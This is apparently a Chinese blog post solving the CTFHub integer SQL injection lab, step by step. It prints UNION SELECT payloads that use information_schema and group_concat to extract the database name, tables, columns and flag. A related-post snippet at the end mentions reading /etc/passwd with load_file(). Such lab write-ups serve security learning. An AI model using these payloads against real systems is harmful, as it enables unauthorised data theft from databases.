CTFHub技能树--整型注入

最新推荐文章于 2024-06-08 13:42:36 发布
最新推荐文章于 2024-06-08 13:42:36 发布
阅读量91 收藏
点赞数
分类专栏: 网络安全 文章标签: 网络安全 sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59099375/article/details/131271010
版权

1.按照题目要求输入1出现回显,首先判断是否有注入点,由于题目指明了整型注入

 2.判断回显位,输入1和2是有回显的,输入3报错可知该表中字段只有两列

 3.开始爆破库名,通过联合查询语句,联合查询之前的值设为一个不存在的值,不然显示不出来

-1 union select 1,database()#;

 得到数据库名为sqli

4.通过group_concat()函数和information_schema爆破表名,

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

得到两个表名,可想而知我们的flag存在flag表中

 5.开始爆破列名

-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'

得到列名为flag 

6.开始爆破具体内容

-1 union select 1,group_concat(flag) from sqli.flag

成功得到flag

 

手握一瓶橘子汽水
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Python-练习或展示技能的Python程序集
08-10
首先,基础操作部分可能涵盖变量、数据类(如整、浮点、字符串、布尔等)、流程控制(如if语句、for循环、while循环)和函数的使用。通过这些基本概念,初学者可以构建起对Python编程的基础理解。 数据结构...
CTFHub技能书解题笔记-SQL注入-整数注入
qq_43006864的博客
12-21 1960
一、到了SQL注入了,这里的话,我建议大家手动注入,要是不熟悉sqlmap的话,建议分别做一遍,这里我附上手动注入的方式。 打开题目 很清楚的告诉我们,整数注入,还告诉我们输个1试试。 看红字部分。噢哟,直接sql语句都出来了, 这个语句很简单了,大家有sql基础的都看得懂, 然后清晰了。 常规做法,下一步恒真式,and 1=1,冲! 有回显,存在注入点了。他并没有加引号,这里也不需要加--+ # 之类的,直接进行注入就行了。 我习惯再url上进行操作,大家也可以再输入框操
CTFHub | 整数注入
尼泊罗河伯的博客
10-25 2457
根据题目描述输入 1 进行测试,发现此题可能存在 SQL 注入漏洞。那么使用' and 1 = 1 ‘和' and 1 = 2’进行判断,此题存在 SQL 整数漏洞注入。那么第一步先判断字段数量,然后检查数据库位置,知道数据库位置后查看数据库版本和数据库名。接着查看一下全部数据库名,并查看这些数据库的表名,发现一个表名为 flag 比较可疑。查看这个表名的全部字段后接着查看表中的数据得到此题 flag 。
CTFHub(整数注入
sGanYu
07-24 2199
目录 SQL注入的前提 手动注入 sqlmap注入 SQL注入的前提 判断是否具备注入条件 可控参数如id=1,能否影响页面的显示结果 输入SQL语句的时候,是否报错,能否通过报错,看到数据库回显的一些语句痕迹 尝试使输入的语句不报错,使得成功闭合语句 判断是什么类注入 语句能否被修改 是否能够成功执行 手动注入 首先判断是否存在注入,输入1回显,输入2回显,输入3,无回显 根据回显内容判断为整数 开始爆字段id=1 order by 1,当id =1.
CTFHUB——整数SQL注入
陈艺秋的博客
01-14 1239
SQL注入
CTFHub - 整数注入
Have_a_great_day的博客
09-07 402
欢迎各位师傅以kill -9 的威力对文章进行检查,Zeus会认真分析听取各位师傅的留言。
电子电路基础:6-3 波形整形电路.ppt
05-19
电子电路基础:6-3 波形整形电路.ppt
安卓应用-健康医疗-美哆整形app v5.0.0.zip
09-15
安卓应用-健康医疗
Python技能课-零基础入门-阶.zip
05-19
学习如何定义变量、数据类(如整、浮点、字符串、布尔)以及使用运算符进行基本计算是入门的第一步。此外,掌握流程控制语句,如条件判断(if-else)和循环(for和while)也是必要的。 函数是Python编程的...
C语言程序设计-体测成绩信息管理系统
01-18
- `num`:学生的学号(整) - `name`:学生姓名(字符数组,长度为20) - `sex`:性别(字符数组,长度为10) - `tzzs`:体质测试总分(浮点) - `fhl`:肺活量(整) - `yt`:引体向上(整) - `yw`...
CTFHUB - SQL注入-整数和字符注入
m0_64180167的博客
11-28 2268
对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的。,在管理员不知情的情况下实现非法操作,以此来实现欺骗。执行非授权的任意查询,从而进一步得到相应的数据信息。在学习SQL注入时要了解一些MYSQL语法。
CTFHUB-技能-Web题-SQL注入-整数注入
Static______的博客
03-28 429
利用 group_concat() 函数进行查询连接所有的表名。还可以读取到 /etc/passwd 文件。load_file( )函数 读文件操作。1,2又有数值,说明两字段都有回显。由此判断存在两个字段。
ctfhub 整数注入
plant1234的博客
06-16 992
整数注入: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schemata s
CTFHUB-SQL注入-整数注入(一)
sev1n的博客
03-01 2206
后端SQL查询语句拼接了前端传递的参数,前端输入恶意的字符,打断了原有sql语句,实现了恶意的查询结果学的不够深入,理解的不够透彻,还是看了一些题解还是需要多练多学多看1.知识点整数注入(1)检查是否存在注入and 1=1 返回正确and 1=2 返回错误(2)猜字段数order by x(x为数字)得出字段数(3)爆数据库名?得到数据库名称sqli(4)爆表名?得到表名 news,flag(5)爆列名?得到字段名flag(6)爆字段内容(flag)?
ctfhub】sql整数注入
hyhyxyx的博客
07-25 266
在1后加一个’ 无回显输入id=1 and 1=1 出现回显将1=1变为1=2—》语句正确但是无法访问数据库(图三)【可判定此处有整数注入漏洞】
CTFHub:web前置技能-SQL注入-整数注入
最新发布
wdnmddbl的博客
06-08 656
路漫漫其修远兮,吾将上下而求索。本文涉及以下知识点,去引用文章学习即可:链接:我是一个知识点链接:我是一个知识点链接:我是一个知识点链接:sqlmap下载点我文章总结有我个人总结的一些知识点,希望对你有所帮助。大概思路和涉及的知识点sql注入基本语句和手工注入流程:#,–+,-- -代表后边忽略,常用与闭合思路:sql注入之数字注入点:许多网页链接有类似的结构。
CTFHub-sql注入-整数注入
qq_54537919的博客
07-22 892
CTFHub-sql注入-整数注入
CTFHUB-WEB-SQL注入-整数注入
weixin_43486981的博客
08-10 520
SQL注入: 题目: 靶机环境 输入1后,查看页面信息 求列数 求显示位 求数据库名 求数据表名 求列名 求字段值
CTFHub SQL注入 整数注入
weixin_44732566的博客
02-12 3734
CTFHub SQL注入 整数注入 强烈推荐这个网站 CTFhub https://www.ctfhub.com/ 分各个类别,题目由易到难 这题还是很基础的,有各种提示 打开是源码,?id=处存在注入 /?id=1 or 1=1 然后就是爆数据库名,information_schema三步 以下是详细步骤: ?id=1 or 1=1 union select 1,database() ...
推选文档最好的C课件-单片机C语言课件教程PPT.ppt
10-27
例如,C51支持的数据类包括位、无符号字符、有符号字符、无符号整、有符号整等,这些数据类的设计直接对应到MCS-51的存储模。此外,C51还支持位操作,这对于控制单片机的端口和寄存器非常重要。C51...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值